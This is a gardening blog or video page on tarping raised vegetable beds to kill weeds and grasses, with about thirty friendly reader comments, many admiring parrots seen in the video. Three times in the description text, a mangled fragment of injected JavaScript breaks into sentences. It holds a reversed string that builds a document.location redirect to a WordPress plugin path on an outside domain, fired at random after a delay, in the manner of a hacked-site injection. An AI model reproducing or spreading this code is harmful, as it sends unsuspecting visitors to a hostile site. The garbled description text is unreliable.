Preventing & Getting Rid of Weeds/Grasses in Vegetable Garden Beds

In this video, I show a smothering method toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to manage unwanted weeds and grasses in vegetable garden beds. At the same time, I also explain several other tips and my own thought process/reasoning for doing what I do. Thanks for your support 🙂

Blog: (use the search bar on my website toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to find info on certain subjects)
Subscribe toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to my channel:

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30 thoughts on “Preventing & Getting Rid of Weeds/Grasses in Vegetable Garden Beds”

  1. PW says:

    Love the parrots. – So colourful. Oz has some of the world's most beautiful birds. To bad it also has MANY of the world's deadliest creatures. Lol !!!

  2. Dolly Perry says:

    Parrots might be annoying to you. But for me here in North America it was the highlight of the video. You are blessed. Thank you for sharing!

  3. Mammie Mania says:

    ohh! You do such work saving plants. You are amazing to want to show us these details. It's in the details that others can learn and appreciate being self sufficient. You are greatly appreciated. Thanks so much for you dedication!

  4. Gate Tres says:

    thanks for great tip !

  5. WW Suwannee says:

    You just gave me a good idea for some shrubs I have been trying to get rid of for a few years. Sometimes I think I'm winning , and sometimes they are obviously winning 🙂  Thanks Mark.

  6. Carlos López says:


    Thanks again (and again) for the good info you share. By the time I get to have my own garden/patio I feel like I'll have a PhD based off the experience shared on your videos and other channels.

    Absolutely beautiful birds! those colors <3


  7. Tim Huffman says:

    Great video Mark. Nicely done.

  8. Janice P says:

    Your place is beautiful! So lush and green. The parrots are so cool!

  9. Janice P says:

    Your place is beautiful! So lush and green. The parrots are so cool!

  10. bowie19jan says:

    Hi Mark, how long would you leave the tarp on the garden bed for?

  11. Daniel Boulton says:

    G'day Mark, how long do you leave the tarp on? Does it kill running grasses like cooch and kikuyu?

  12. Homebirth Homeschool Homestead says:

    Those birds are ridiculously beautiful. We only ever see birds like that in the zoo!

  13. Ruth Williamson says:

    Excellent! Last year, I actually added another layer of manure before I put the tarp down, because I love the benefits of manure, but I was frustrated by how many weeds came along with it! I figured why not add the manure first, and smother it in advance? It worked well, and the soil underneath seemed less "dead" when I removed the tarp. So that was good!

  14. L B says:

    Mark, I learn so much from your videos. Thank you!

    I know parrots must be a common sight for you, but not for us here in the States. With all the lovely birds down under, I'm surprised you haven't given them a proper birdbath.

  15. Jeanette Doorey says:

    I got an I select add,

  16. Jeanette Doorey says:

    Great video Mark,thanks

  17. Wendy Rowland says:

    I have not tried it, but "lasagne" gardening is good way of smothering the weeds. You place cardboard or thick layers of newspaper over the bed. Then you cover it all with a generous layer of manure. The worms will draw the nutrients through and the card will decompose having done its' job. I think any virulent aggressive grasses need to be carefully forked through and removed. I love to see the parrots, in case you didn't understand them, they asked you not to sort the gutter.

  18. 50 shades of green says:

    hello Mark !! great update on how two prevent and eradicate weeds In your raised beds !! great looking birds taking a bath in your gutters !! thanks for sharing and happy gardening !!

  19. Hewett Homestead says:

    Hey, New subber her from the US. Thats an amazing set up beother. Looking forward to checking out more. Check out our channel when you get a chance!

  20. wildchook (Mary) says:

    Good idea Mark. I am going to do the same with my garden too.

  21. Bryce Leonardo says:

    what kind of vineing spinach was that with the berries?

  22. Teija Nelson says:

    I also have to tarp grass. We have nut grass but it's the Bermuda grass that is the Devil here in Arkansas. I have never seen a long tarp like you have. Is it from marine use? What is the other fabric you mentioned?

  23. Two Family Homestead says:

    Love your raised beds !! I'd like you to consider being a guest on our Monday evening live stream (9pm est) we'd love to have you 🙂

  24. Jenny Jones says:

    For instance layer papers and put dirt over them and plant

  25. 1969rbmustangboss says:

    I once asked my late father what was the best way to get rid of nut grass and his answer was, "Move off and leave it." lol

  26. David Thelan says:

    With your beds why don't you make a Chicken coop up to sit over the beds to let them go through the bed and take out all the seeds and weeds plus compost the bed at the sane time

  27. LASummer says:

    Beautiful birds!

  28. Terry Obright says:

    having the same problem grass has just taken over my garden and I can't seem to keep up. Oh my that black frill mustard will become a drama for you those seeds just keep coming back. I hate that mustard. I am going to try and get it out of my garden. Red Malabar growing, good for you. I love my Holy Basil the best in my garden. I am trying to get longevity spinach to take off, and some Egyptian onion this year. Learning about Hugelkultur beds. That grass is driving me mad also. good luck with getting rid of it! thnx for sharing the clip about the beautiful birds splashing in the water that's to cool!

  29. matt north says:

    love ya work. I'm putting another garden bed in this week. Really need to look at what I can grow and what time of year to plant things. Any suggestions?

  30. Mark Spain says:

    The birds were a plus.

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